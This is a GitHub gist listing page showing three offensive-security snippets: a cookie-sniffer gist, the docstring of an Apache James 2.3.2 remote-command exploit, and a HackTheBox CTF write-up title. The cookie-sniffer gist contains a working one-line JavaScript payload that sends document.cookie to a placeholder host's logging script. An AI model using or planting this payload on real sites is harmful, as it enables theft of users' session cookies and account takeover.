Skip to content

Instantly share code, notes, and snippets.

View NoorQureshi's full-sized avatar

Noor Qureshi NoorQureshi

View GitHub Profile
@farukuzun
farukuzun / get.js
Last active July 13, 2019 19:20
Simple PHP Cookie Sniffer
i=new/**/Image();i.src='http://host/log.php?cookie='+escape(document.cookie);
@kjiwa
kjiwa / apache-james-exploit.py
Last active December 8, 2022 08:50
An exploit for Apache James 2.3.2 that executes remote commands. https://crimsonglow.ca/~kjiwa/2016/06/exploiting-apache-james-2.3.2.html
"""An exploit for Apache James 2.3.2 that executes remote commands.
This script creates a new user and enqueues a payload to be executed the next
time a user logs in to the machine. The vulnerability is documented in
CVE-2015-7611.
For more details, see http://www.securityfocus.com/bid/76933 and
https://www.exploit-db.com/exploits/35513/.
"""
@berzerk0
berzerk0 / CTFWRITE-Europa-HTB.md
Last active November 15, 2018 19:19
CTF Writeup: Europa on HackTheBox